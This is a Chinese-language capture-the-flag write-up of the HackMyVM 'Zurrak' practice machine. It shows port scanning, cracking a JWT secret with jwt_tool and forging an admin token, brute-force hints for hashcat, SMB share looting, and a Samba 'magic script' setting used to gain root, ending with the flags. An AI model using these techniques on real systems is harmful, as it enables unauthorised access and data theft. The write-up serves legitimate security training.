hackmyvm Zurrak靶机复盘
难度-Medium
hackmyvm Zurrak靶机复盘
网段扫描
1
2
3
4
5
6
7
8
9
root@LingMj:/home/lingmj/xxoo# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:df:e2:a7, IPv4: 192.168.56.110
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:12 (Unknown: locally administered)
192.168.56.100 08:00:27:a3:c4:7b PCS Systemtechnik GmbH
192.168.56.140 08:00:27:f7:cd:f1 PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.355 seconds (108.70 hosts/sec). 3 responded
端口扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
root@LingMj:/home/lingmj/xxoo# nmap -p- -sC -sV 192.168.56.140
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-06 06:46 EST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.140
Host is up (0.012s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.57 ((Debian))
| http-title: Login Page
|_Requested resource was login.php
|_http-server-header: Apache/2.4.57 (Debian)
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
5432/tcp open postgresql PostgreSQL DB 9.6.0 or later
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=zurrak
| Subject Alternative Name: DNS:zurrak
| Not valid before: 2023-10-20T19:29:16
|_Not valid after: 2033-10-17T19:29:16
| fingerprint-strings:
| SMBProgNeg:
| SFATAL
| VFATAL
| C0A000
| Munsupported frontend protocol 65363.19778: server supports 3.0 to 3.0
| Fpostmaster.c
| L2195
|_ RProcessStartupPacket
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5432-TCP:V=7.94SVN%I=7%D=2/6%Time=67A4A16C%P=x86_64-pc-linux-gnu%r(
SF:SMBProgNeg,8C,"E\0\0\0\x8bSFATAL\0VFATAL\0C0A000\0Munsupported\x20front
SF:end\x20protocol\x2065363\.19778:\x20server\x20supports\x203\.0\x20to\x2
SF:03\.0\0Fpostmaster\.c\0L2195\0RProcessStartupPacket\0\0");
MAC Address: 08:00:27:F7:CD:F1 (Oracle VirtualBox virtual NIC)
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: 7h59m58s
| smb2-time:
| date: 2025-02-06T19:48:02
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.30 seconds
获取webshell
啊,信息怎么少
地址:https://github.com/ticarpi/jwt_tool
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
root@LingMj:/home/lingmj/xxoo1/jwt_tool# python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImludGVybmFsQHp1cnJhay5odGIiLCJpc0FkbWluIjp0cnVlLCJpYXQiOjEzNTY5OTk1MjQsIm5iZiI6MTM1NzAwMDAwMH0.GZiD9dJTb0NTJtHftOE01HXTVTW2arpE-w-xgWEJwZQ -jw /usr/share/wordlists/rockyou.txt
\ \ \ \ \ \
\__ | | \ |\__ __| \__ __| |
| | \ | | | \ \ |
| \ | | | __ \ __ \ |
\ | _ | | | | | | | |
| | / \ | | | | | | | |
\ | / \ | | |\ |\ | |
\______/ \__/ \__| \__| \__| \______/ \______/ \__|
Version 2.2.7 \______| @ticarpi
No config file yet created.
Running config setup.
Configuration file built - review contents of "jwtconf.ini" to customise your options.
Make sure to set the "httplistener" value to a URL you can monitor to enable out-of-band checks.
root@LingMj:/home/lingmj/xxoo1/jwt_tool# python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImludGVybmFsQHp1cnJhay5odGIiLCJpc0FkbWluIjp0cnVlLCJpYXQiOjEzNTY5OTk1MjQsIm5iZiI6MTM1NzAwMDAwMH0.GZiD9dJTb0NTJtHftOE01HXTVTW2arpE-w-xgWEJwZQ -kf /usr/share/wordlists/rockyou.txt
\ \ \ \ \ \
\__ | | \ |\__ __| \__ __| |
| | \ | | | \ \ |
| \ | | | __ \ __ \ |
\ | _ | | | | | | | |
| | / \ | | | | | | | |
\ | / \ | | |\ |\ | |
\______/ \__/ \__| \__| \__| \______/ \______/ \__|
Version 2.2.7 \______| @ticarpi
Original JWT:
=====================
Decoded Token Values:
=====================
Token header values:
[+] typ = "JWT"
[+] alg = "HS256"
Token payload values:
[+] email = "internal@zurrak.htb"
[+] isAdmin = True
[+] iat = 1356999524 ==> TIMESTAMP = 2012-12-31 19:18:44 (UTC)
[+] nbf = 1357000000 ==> TIMESTAMP = 2012-12-31 19:26:40 (UTC)
Seen timestamps:
[*] iat was seen
[*] nbf is later than iat by: 0 days, 0 hours, 7 mins
----------------------
JWT common timestamps:
iat = IssuedAt
exp = Expires
nbf = NotBefore
----------------------
root@LingMj:/home/lingmj/xxoo1/jwt_tool# python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImludGVybmFsQHp1cnJhay5odGIiLCJpc0FkbWluIjp0cnVlLCJpYXQiOjEzNTY5OTk1MjQsIm5iZiI6MTM1NzAwMDAwMH0.GZiD9dJTb0NTJtHftOE01HXTVTW2arpE-w-xgWEJwZQ -p /usr/share/wordlists/rockyou.txt
\ \ \ \ \ \
\__ | | \ |\__ __| \__ __| |
| | \ | | | \ \ |
| \ | | | __ \ __ \ |
\ | _ | | | | | | | |
| | / \ | | | | | | | |
\ | / \ | | |\ |\ | |
\______/ \__/ \__| \__| \__| \______/ \______/ \__|
Version 2.2.7 \______| @ticarpi
Original JWT:
=====================
Decoded Token Values:
=====================
Token header values:
[+] typ = "JWT"
[+] alg = "HS256"
Token payload values:
[+] email = "internal@zurrak.htb"
[+] isAdmin = True
[+] iat = 1356999524 ==> TIMESTAMP = 2012-12-31 19:18:44 (UTC)
[+] nbf = 1357000000 ==> TIMESTAMP = 2012-12-31 19:26:40 (UTC)
Seen timestamps:
[*] iat was seen
[*] nbf is later than iat by: 0 days, 0 hours, 7 mins
----------------------
JWT common timestamps:
iat = IssuedAt
exp = Expires
nbf = NotBefore
----------------------
root@LingMj:/home/lingmj/xxoo1/jwt_tool# python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImludGVybmFsQHp1cnJhay5odGIiLCJpc0FkbWluIjp0cnVlLCJpYXQiOjEzNTY5OTk1MjQsIm5iZiI6MTM1NzAwMDAwMH0.GZiD9dJTb0NTJtHftOE01HXTVTW2arpE-w-xgWEJwZQ -C -d /usr/share/wordlists/rockyou.txt
\ \ \ \ \ \
\__ | | \ |\__ __| \__ __| |
| | \ | | | \ \ |
| \ | | | __ \ __ \ |
\ | _ | | | | | | | |
| | / \ | | | | | | | |
\ | / \ | | |\ |\ | |
\______/ \__/ \__| \__| \__| \______/ \______/ \__|
Version 2.2.7 \______| @ticarpi
Original JWT:
[*] Tested 1 million passwords so far
[*] Tested 2 million passwords so far
[*] Tested 3 million passwords so far
[*] Tested 4 million passwords so far
[*] Tested 5 million passwords so far
^C^C^C^C^C^C[*] Tested 6 million passwords so far
[*] Tested 7 million passwords so far
[*] Tested 8 million passwords so far
[*] Tested 9 million passwords so far
[*] Tested 10 million passwords so far
[*] Tested 11 million passwords so far
[*] Tested 12 million passwords so far
[*] Tested 13 million passwords so far
[*] Tested 14 million passwords so far
[-] Key not in dictionary
===============================
As your list wasn't able to crack this token you might be better off using longer dictionaries, custom dictionaries, mangling rules, or brute force attacks.
hashcat (https://hashcat.net/hashcat/) is ideal for this as it is highly optimised for speed. Just add your JWT to a text file, then use the following syntax to give you a good start:
[*] dictionary attacks: hashcat -a 0 -m 16500 jwt.txt passlist.txt
[*] rule-based attack: hashcat -a 0 -m 16500 jwt.txt passlist.txt -r rules/best64.rule
[*] brute-force attack: hashcat -a 3 -m 16500 jwt.txt ?u?l?l?l?l?l?l?l -i --increment-min=6
===============================
root@LingMj:/home/lingmj/xxoo1/jwt_tool# python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImludGVybmFsQHp1cnJhay5odGIiLCJpc0FkbWluIjpmYWxzZSwiaWF0IjoxMzU2OTk5NTI0LCJuYmYiOjEzNTcwMDAwMDB9.ufkwBsusc4IEYCCRszCbcSEv6irCtUSx-Uq08OThxso -C -d /usr/share/wordlists/rockyou.txt
\ \ \ \ \ \
\__ | | \ |\__ __| \__ __| |
| | \ | | | \ \ |
| \ | | | __ \ __ \ |
\ | _ | | | | | | | |
| | / \ | | | | | | | |
\ | / \ | | |\ |\ | |
\______/ \__/ \__| \__| \__| \______/ \______/ \__|
Version 2.2.7 \______| @ticarpi
Original JWT:
[*] Tested 1 million passwords so far
[*] Tested 2 million passwords so far
[+] TEST123 is the CORRECT key!
You can tamper/fuzz the token contents (-T/-I) and sign it using:
python3 jwt_tool.py [options here] -S hs256 -p "TEST123"
cookie:token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImludGVybmFsQHp1cnJhay5odGIiLCJpc0FkbWluIjp0cnVlLCJpYXQiOjEzNTY5OTk1MjQsIm5iZiI6MTM1NzAwMDAwMH0.gBpFlpNfVUBlv9HuqXqVzRtaHR265PFagumX_OAKCMY
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
root@LingMj:/home/lingmj/xxoo# exiftool zurrakhorse.jpg
ExifTool Version Number : 12.76
File Name : zurrakhorse.jpg
Directory : .
File Size : 674 kB
File Modification Date/Time : 2023:10:24 13:03:45-04:00
File Access Date/Time : 2025:02:06 07:48:12-05:00
File Inode Change Date/Time : 2025:02:06 07:48:12-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
Exif Byte Order : Big-endian (Motorola, MM)
Orientation : Horizontal (normal)
X Resolution : 72
Y Resolution : 72
Resolution Unit : inches
Software : Adobe Photoshop CC 2018 (Windows)
Modify Date : 2023:10:24 20:02:16
Color Space : sRGB
Exif Image Width : 2000
Exif Image Height : 2068
Compression : JPEG (old-style)
Thumbnail Offset : 318
Thumbnail Length : 4962
IPTC Digest : 00000000000000000000000000000000
Displayed Units X : inches
Displayed Units Y : inches
Print Style : Centered
Print Position : 0 0
Print Scale : 1
Global Angle : 90
Global Altitude : 30
URL List :
Slices Group Name : Untitled-1
Num Slices : 1
Pixel Aspect Ratio : 1
Photoshop Thumbnail : (Binary data 4962 bytes, use -b option to extract)
Has Real Merged Data : Yes
Writer Name : Adobe Photoshop
Reader Name : Adobe Photoshop CC 2018
Photoshop Quality : 12
Photoshop Format : Standard
XMP Toolkit : Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39
Creator Tool : Adobe Photoshop CC 2018 (Windows)
Create Date : 2023:10:24 20:02:16+03:00
Metadata Date : 2023:10:24 20:02:16+03:00
Instance ID : xmp.iid:d3c42f7a-fc08-564b-9680-0732f5c21a40
Document ID : adobe:docid:photoshop:c103a364-af37-f544-81a7-31dc1bd0ec79
Original Document ID : xmp.did:a2b7154c-9def-2f41-9d90-56f8411511de
Format : image/jpeg
Color Mode : RGB
ICC Profile Name : sRGB IEC61966-2.1
History Action : created, saved
History Instance ID : xmp.iid:a2b7154c-9def-2f41-9d90-56f8411511de, xmp.iid:d3c42f7a-fc08-564b-9680-0732f5c21a40
History When : 2023:10:24 20:02:16+03:00, 2023:10:24 20:02:16+03:00
History Software Agent : Adobe Photoshop CC 2018 (Windows), Adobe Photoshop CC 2018 (Windows)
History Changed : /
Profile CMM Type : Linotronic
Profile Version : 2.1.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 1998:02:09 06:49:00
Profile File Signature : acsp
Primary Platform : Microsoft Corporation
CMM Flags : Not Embedded, Independent
Device Manufacturer : Hewlett-Packard
Device Model : sRGB
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Media-Relative Colorimetric
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Hewlett-Packard
Profile ID : 0
Profile Copyright : Copyright (c) 1998 Hewlett-Packard Company
Profile Description : sRGB IEC61966-2.1
Media White Point : 0.95045 1 1.08905
Media Black Point : 0 0 0
Red Matrix Column : 0.43607 0.22249 0.01392
Green Matrix Column : 0.38515 0.71687 0.09708
Blue Matrix Column : 0.14307 0.06061 0.7141
Device Mfg Desc : IEC http://www.iec.ch
Device Model Desc : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant : 19.6445 20.3718 16.8089
Viewing Cond Surround : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type : D50
Luminance : 76.03647 80 87.12462
Measurement Observer : CIE 1931
Measurement Backing : 0 0 0
Measurement Geometry : Unknown
Measurement Flare : 0.999%
Measurement Illuminant : D65
Technology : Cathode Ray Tube Display
Red Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
DCT Encode Version : 100
APP14 Flags 0 : [14]
APP14 Flags 1 : (none)
Color Transform : YCbCr
Image Width : 2000
Image Height : 2068
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 2000x2068
Megapixels : 4.1
Thumbnail Image : (Binary data 4962 bytes, use -b option to extract)
root@LingMj:/home/lingmj/xxoo# exiftool zurrakhearts.jpg
ExifTool Version Number : 12.76
File Name : zurrakhearts.jpg
Directory : .
File Size : 2.9 MB
File Modification Date/Time : 2023:10:24 13:41:37-04:00
File Access Date/Time : 2025:02:06 07:48:38-05:00
File Inode Change Date/Time : 2025:02:06 07:48:38-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 5000
Image Height : 4875
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 5000x4875
Megapixels : 24.4
root@LingMj:/home/lingmj/xxoo# exiftool zurraksnake.jpg
ExifTool Version Number : 12.76
File Name : zurraksnake.jpg
Directory : .
File Size : 771 kB
File Modification Date/Time : 2023:10:24 13:03:45-04:00
File Access Date/Time : 2025:02:06 07:48:28-05:00
File Inode Change Date/Time : 2025:02:06 07:48:28-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
Exif Byte Order : Big-endian (Motorola, MM)
Orientation : Horizontal (normal)
X Resolution : 72
Y Resolution : 72
Resolution Unit : inches
Software : Adobe Photoshop CC 2018 (Windows)
Modify Date : 2023:10:24 20:02:59
Color Space : sRGB
Exif Image Width : 2000
Exif Image Height : 2113
Compression : JPEG (old-style)
Thumbnail Offset : 318
Thumbnail Length : 6114
IPTC Digest : 00000000000000000000000000000000
Displayed Units X : inches
Displayed Units Y : inches
Print Style : Centered
Print Position : 0 0
Print Scale : 1
Global Angle : 90
Global Altitude : 30
URL List :
Slices Group Name : Untitled-1
Num Slices : 1
Pixel Aspect Ratio : 1
Photoshop Thumbnail : (Binary data 6114 bytes, use -b option to extract)
Has Real Merged Data : Yes
Writer Name : Adobe Photoshop
Reader Name : Adobe Photoshop CC 2018
Photoshop Quality : 12
Photoshop Format : Standard
XMP Toolkit : Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39
Creator Tool : Adobe Photoshop CC 2018 (Windows)
Create Date : 2023:10:24 20:02:59+03:00
Metadata Date : 2023:10:24 20:02:59+03:00
Instance ID : xmp.iid:55ce4063-a1ae-2445-839f-9555816e0bbc
Document ID : adobe:docid:photoshop:90b830b4-61fe-5b45-9d2e-7fb64a62c211
Original Document ID : xmp.did:32726908-a22b-404b-8560-081a5437a5cb
Format : image/jpeg
Color Mode : RGB
ICC Profile Name : sRGB IEC61966-2.1
History Action : created, saved
History Instance ID : xmp.iid:32726908-a22b-404b-8560-081a5437a5cb, xmp.iid:55ce4063-a1ae-2445-839f-9555816e0bbc
History When : 2023:10:24 20:02:59+03:00, 2023:10:24 20:02:59+03:00
History Software Agent : Adobe Photoshop CC 2018 (Windows), Adobe Photoshop CC 2018 (Windows)
History Changed : /
Profile CMM Type : Linotronic
Profile Version : 2.1.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 1998:02:09 06:49:00
Profile File Signature : acsp
Primary Platform : Microsoft Corporation
CMM Flags : Not Embedded, Independent
Device Manufacturer : Hewlett-Packard
Device Model : sRGB
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Media-Relative Colorimetric
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Hewlett-Packard
Profile ID : 0
Profile Copyright : Copyright (c) 1998 Hewlett-Packard Company
Profile Description : sRGB IEC61966-2.1
Media White Point : 0.95045 1 1.08905
Media Black Point : 0 0 0
Red Matrix Column : 0.43607 0.22249 0.01392
Green Matrix Column : 0.38515 0.71687 0.09708
Blue Matrix Column : 0.14307 0.06061 0.7141
Device Mfg Desc : IEC http://www.iec.ch
Device Model Desc : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant : 19.6445 20.3718 16.8089
Viewing Cond Surround : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type : D50
Luminance : 76.03647 80 87.12462
Measurement Observer : CIE 1931
Measurement Backing : 0 0 0
Measurement Geometry : Unknown
Measurement Flare : 0.999%
Measurement Illuminant : D65
Technology : Cathode Ray Tube Display
Red Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
DCT Encode Version : 100
APP14 Flags 0 : [14]
APP14 Flags 1 : (none)
Color Transform : YCbCr
Image Width : 2000
Image Height : 2113
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 2000x2113
Megapixels : 4.2
Thumbnail Image : (Binary data 6114 bytes, use -b option to extract)
root@LingMj:/home/lingmj/xxoo#
不擅长看这玩意,算了一个一个点,目前看没信息了,提示是smb爆破
有结果了
没扫出来这个目录呢,不然挨个试一下
我好像懂了
ok
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
smb: \> dir
. D 0 Fri Oct 20 17:14:00 2023
.. D 0 Fri Oct 20 16:36:51 2023
DONTDELETE D 0 Fri Oct 20 23:44:44 2023
operations D 0 Sat Oct 21 00:04:30 2023
backup.reg N 1792 Sun Jul 24 01:30:09 2011
human_resources D 0 Sun Apr 2 01:30:09 2017
launch_options.txt N 21 Tue Dec 13 22:55:16 2022
9232860 blocks of size 1024. 5935824 blocks available
smb: \> cd DONTDELETE\
smb: \DONTDELETE\> dir
. D 0 Fri Oct 20 23:44:44 2023
.. D 0 Fri Oct 20 17:14:00 2023
eric D 0 Fri Oct 20 23:45:22 2023
New folder D 0 Fri Oct 20 23:43:30 2023
9232860 blocks of size 1024. 5935824 blocks available
smb: \DONTDELETE\> cd eric\
smb: \DONTDELETE\eric\> dir
. D 0 Fri Oct 20 23:45:22 2023
.. D 0 Fri Oct 20 23:44:44 2023
190709234924.BMP N 2359350 Tue Jul 9 23:49:48 2019
bios N 1586 Sun Jul 7 20:06:20 2019
biosoc2 N 4194304 Mon Aug 19 20:47:38 2019
New Text Document.txt N 0 Fri Oct 20 23:44:48 2023
190709234911.BMP N 2359350 Tue Jul 9 23:49:22 2019
biosoc N 4194304 Sun Jul 7 20:06:56 2019
190709234935.BMP N 2359350 Tue Jul 9 23:49:06 2019
9232860 blocks of size 1024. 5935824 blocks available
smb: \DONTDELETE\eric\> cd ..
smb: \DONTDELETE\> cd New folder\
cd \DONTDELETE\New\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \DONTDELETE\> cd ..
smb: \> dir
. D 0 Fri Oct 20 17:14:00 2023
.. D 0 Fri Oct 20 16:36:51 2023
DONTDELETE D 0 Fri Oct 20 23:44:44 2023
operations D 0 Sat Oct 21 00:04:30 2023
backup.reg N 1792 Sun Jul 24 01:30:09 2011
human_resources D 0 Sun Apr 2 01:30:09 2017
launch_options.txt N 21 Tue Dec 13 22:55:16 2022
9232860 blocks of size 1024. 5935824 blocks available
smb: \> cd operations\
smb: \operations\> dir
. D 0 Sat Oct 21 00:04:30 2023
.. D 0 Fri Oct 20 17:14:00 2023
binaries D 0 Tue Nov 14 04:08:42 2023
operators.txt N 118 Tue Dec 18 01:30:09 2001
New folder D 0 Tue Dec 18 01:30:09 2001
9232860 blocks of size 1024. 5935824 blocks available
smb: \operations\> get operators.txt
getting file \operations\operators.txt of size 118 as operators.txt (5.8 KiloBytes/sec) (average 5.8 KiloBytes/sec)
smb: \operations\> cd binaries\
smb: \operations\binaries\> dir
. D 0 Tue Nov 14 04:08:42 2023
.. D 0 Sat Oct 21 00:04:30 2023
WinSCP-6.1.1-Setup.exe N 11120192 Tue Dec 18 01:30:09 2001
python-3.12.0-amd64.exe N 26507904 Tue Dec 18 01:30:09 2001
LAPS.x64.msi N 1118208 Tue Dec 18 01:30:09 2001
9232860 blocks of size 1024. 5935824 blocks available
smb: \operations\binaries\> cd ..
smb: \operations\> ls
. D 0 Sat Oct 21 00:04:30 2023
.. D 0 Fri Oct 20 17:14:00 2023
binaries D 0 Tue Nov 14 04:08:42 2023
operators.txt N 118 Tue Dec 18 01:30:09 2001
New folder D 0 Tue Dec 18 01:30:09 2001
9232860 blocks of size 1024. 5935824 blocks available
smb: \operations\> cd New folder\
cd \operations\New\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \operations\> cd ..
smb: \> ls
. D 0 Fri Oct 20 17:14:00 2023
.. D 0 Fri Oct 20 16:36:51 2023
DONTDELETE D 0 Fri Oct 20 23:44:44 2023
operations D 0 Sat Oct 21 00:04:30 2023
backup.reg N 1792 Sun Jul 24 01:30:09 2011
human_resources D 0 Sun Apr 2 01:30:09 2017
launch_options.txt N 21 Tue Dec 13 22:55:16 2022
9232860 blocks of size 1024. 5935824 blocks available
smb: \> cd human_resources\
smb: \human_resources\> idr
idr: command not found
smb: \human_resources\> dir
. D 0 Sun Apr 2 01:30:09 2017
.. D 0 Fri Oct 20 17:14:00 2023
employees.csv N 4750 Fri Oct 20 23:49:46 2023
status.txt N 42 Fri Oct 20 23:51:28 2023
9232860 blocks of size 1024. 5935824 blocks available
smb: \human_resources\> get employees.csv
getting file \human_resources\employees.csv of size 4750 as employees.csv (210.8 KiloBytes/sec) (average 113.2 KiloBytes/sec)
smb: \human_resources\> get status.txt
getting file \human_resources\status.txt of size 42 as status.txt (3.2 KiloBytes/sec) (average 87.2 KiloBytes/sec)
smb: \human_resources\> cd ..
smb: \> dir
. D 0 Fri Oct 20 17:14:00 2023
.. D 0 Fri Oct 20 16:36:51 2023
DONTDELETE D 0 Fri Oct 20 23:44:44 2023
operations D 0 Sat Oct 21 00:04:30 2023
backup.reg N 1792 Sun Jul 24 01:30:09 2011
human_resources D 0 Sun Apr 2 01:30:09 2017
launch_options.txt N 21 Tue Dec 13 22:55:16 2022
9232860 blocks of size 1024. 5935824 blocks available
smb: \> get launch_options.txt
这个目录一直没进去
这里已经无思路了看一下小白wp
偷懒了,直接grup过一下这部分,太试了上面的账号密码,而且没有对应的端口
还有一个端口没用了
有poc直接用poc
提权
又没有自己打自己吧
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
[ipc$]
hosts allow = 127.0.0.1
hosts deny = 0.0.0.0/0
guest ok = no
browseable = no
[share]
comment = "zurrak operations share"
path = /opt/smbshare
hosts allow = 0.0.0.0/0
guest ok = no
browseable = yes
writable = no
valid users = emre, asli
[internal]
comment = "zurrak internal share"
path = /opt/internal
hosts allow = 127.0.0.1
guest ok = no
browseable = yes
writable = yes
valid users = emre
create mask = 0777
directory mask = 0777
force user = root
magic script = emergency.sh
postgres@zurrak:/home/postgres$
登录进去就结束了,但是密码不对
靠在这里哎受不了
终于结束了,这个靶场有意思
userflag:fe8f97f109ceb0362c95e60338c4c1a8
rootflag:66fce7650a88ac2afd99d061e1c6a4df
This post is licensed under CC BY 4.0 by the author.